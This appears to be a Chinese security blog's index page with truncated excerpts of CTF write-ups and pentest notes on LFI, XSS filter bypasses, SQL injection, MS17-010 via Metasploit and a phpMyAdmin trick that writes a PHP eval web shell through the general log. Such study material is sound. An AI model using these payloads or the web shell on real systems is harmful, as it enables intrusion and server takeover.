iloveflag-blog

iloveflag-blog

iloveflag.com

pwn学习笔记
pwntools常用指令p64(int) 8个bite为一组,最小的放前面,依次排列u64(str) 上面的逆过程p32(int)u32(str)remote(host, port) / process(path).recv(int) 7 => Hello world! => ‘Hello w’.recvuntil(str) ‘or’ => Hello world! => ‘Hello wor’.recvline() === .recvuntil(‘\n’).send(str) ‘payload’ => ‘payload’.sendline(str) ‘...
2019西湖论剑web
web1进入首页发现include $_GET[‘file’]在底部发现提示用php伪协议读出源码base64解密后为123456<?php$a = @$_GET['dir'];if(!$a){$a = '/tmp';}var_dump(scandir($a));目录穿越发现flag回到首页读取flag web2xss,发现script被过滤了利用iframe标签加data base64编码绕过payload:1<iframe src="data:text/html...
Python脚本与Metasploit交互批量产出MS17_010 shell
文章首发于安恒网络空间安全讲武堂: https://mp.weixin.qq.com/s?__biz=MzU1MzE3Njg2Mw==&mid=2247486376&idx=2&sn=9a49858e4fb27fb41942b252f43cf68f&chksm=fbf791d8cc8018ce178dfeb612f28ad08e7ca503195f1609ff4928d409a6e9e127514f86ca22 前言:2017年5月,被称为近10年来影响范围最广泛“最嚣张”的WannaCry勒索病毒席卷全球,据统计,全球共有150多个国家超30万台终端被感...
pentesterlab中xss+Code injection的练习
1.<script>alert(“xss”)</script> 普通xss 2.<Script>alert(“xss”)</Script> 大小写绕过,<script>被替换,preg_replace 函数替换成空 3.<scri<script>pt>alert(“xss”)</scri</script>pt> <script>被替换,preg_replace 函数替换成空 4.<img src=”1″ onerror=”aler...
hgame2019 部分web-wp
Level-week 1谁吃了我的flag:根据题目提示可以看出是vim泄露vim -r http://118.25.111.31:10086/.index.html.swp 换头大作战: very easy web:url双次编码绕过http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572 can u find me?: Level-week 2easy_php:http://118.24.25.25:9999/easyphp/img/index.php?img=php://f...
phpMyAdmin提权
信息收集:123select @@datadir;SHOW VARIABLES LIKE “log%”SHOW VARIABLES LIKE “general%”写马:123set global general_log = “ON”;SET global general_log_file=’网站根目录’;select <?php eval($_POST[1])> ;
用updatexml报错注入技术解出2018nctf 滴!晨跑打卡
UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找到的符合条件的数据 本地调试: 根据中间字符串的拼接,可以获取关键信息 尝试输入常见字符进行判断,单引号报错,且过滤了空格,#,空格可以使用()和%a0绕过 判断代码基本是这样的: 获取version(): http://...
2018hctf web
HCTF的时间和软考撞了,这个星期复现一下(还不是自己太菜了说) warmup:首先打开hint文件 打开flag,无法进入.首先想到%00截断,也无效果 在首页index.php中发现源码链接: 关键部分为: 看来是通过?分割的 payload:index.php?file=hint.php?/../../../../../ffffllllaaaagggg kzone部署问题:复现的时候部署在centos7上出现了403问题,进入容器就已经403了,后面出题人大哥说ubuntu部署没有问题,换成了ubuntu,没有发现问题 打开后跳转到了qq空间 利用fiddler改r...
异或的研究
题目来自梅子酒师傅: 1234567891011121314include "flag.php"; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die(...
2018杭电公测ctf writeup
第一题:签到题   把maxlength去掉就行了 第二题:躲躲藏藏 给了一张图片,binwalk扫了下,没有看见合并的迹象(脑子发抽,浪费很多时间) winhex打开 发现base64加密: 第三题:紧急报文 转换为16进制,发现都是adfgvx的字母组成,对照字母表解出答案 AF FG AF FG GF FD GA GX AG AG GF AF FX GG GA XF ADa s a s c f g x l l c a n u g e t...